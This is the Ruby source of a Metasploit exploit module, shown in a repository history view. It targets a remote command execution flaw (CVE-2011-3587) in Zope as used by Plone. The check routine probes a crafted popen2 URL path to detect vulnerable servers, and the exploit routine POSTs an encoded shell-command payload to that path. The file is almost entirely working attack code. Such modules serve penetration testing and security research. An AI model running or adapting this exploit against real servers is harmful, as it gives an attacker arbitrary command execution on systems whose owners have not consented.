metasploit-framework/modules/exploits/multi/http/plone_popen2.rb

89 lines
2.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'Plone and Zope XMLTools Remote Command Execution',
'Description' => %q{
Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
the use of Python modules.
2013-08-30 21:28:54 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Plone Security team', # Vulnerability discovery
'Nick Miles', # Original exploit
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
],
'References' =>
[
['CVE', '2011-3587'],
['OSVDB', '76105'],
['EDB', '18262'],
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet perl ruby python',
}
},
'Platform' => %w{ linux unix },
2013-08-30 21:28:54 +00:00
'Arch' => ARCH_CMD,
'Targets' => [['Automatic',{}]],
'DisclosureDate' => 'Oct 04 2011',
'DefaultTarget' => 0
))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(8080),
OptString.new('URI',[true, "The path to the Plone installation", "/"]),
],self.class)
register_autofilter_ports([ 8080 ])
end
2013-08-30 21:28:54 +00:00
def check
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
2013-08-30 21:28:54 +00:00
res = send_request_raw(
{
'uri' => uri
}, 25)
if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)
return Exploit::CheckCode::Appears
2013-08-30 21:28:54 +00:00
end
# patched == zExceptions.NotFound
return Exploit::CheckCode::Safe
end
2013-08-30 21:28:54 +00:00
def exploit
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
2013-08-30 21:28:54 +00:00
send_request_cgi(
{
'method' => 'POST',
'uri' => uri,
'vars_post' =>
{
'cmd' => payload.encoded,
}
}, 0.5) # short timeout, we don't care about the response
end
end